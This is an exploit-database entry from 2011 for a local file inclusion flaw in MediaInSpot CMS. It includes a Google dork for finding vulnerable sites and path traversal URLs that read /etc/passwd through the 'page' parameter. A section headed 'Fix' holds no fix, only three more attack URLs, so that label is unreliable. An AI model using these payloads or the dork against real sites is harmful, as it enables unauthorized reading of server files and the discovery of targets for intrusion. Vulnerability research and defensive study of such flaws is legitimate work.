MediaInSpot CMS - Local File Inclusion (2)

2011-05-16T00:00:00
ID EXPLOITPACK:DAE1ED54AE3FCDC264481B00ECB98C1D
Type exploitpack
Reporter wlhaan haker
Modified 2011-05-16T00:00:00

Description

MediaInSpot CMS - Local File Inclusion (2)

                                        
                                            #Name : Media In Spot LFI Vulnerability
#Date : May,16 2011
#Vendor Url :http:http://www.mediainspot.com/

#Dork:"
"Powred By Media In Spot""

#Author : wlhaan haker <iit[at]hotmail.com>


###############################################################################################################
Exploit:
http://server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
 
###############################################################################################################
Fix:

demo

http://site.com/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

http://site.com/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

http://site.com/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd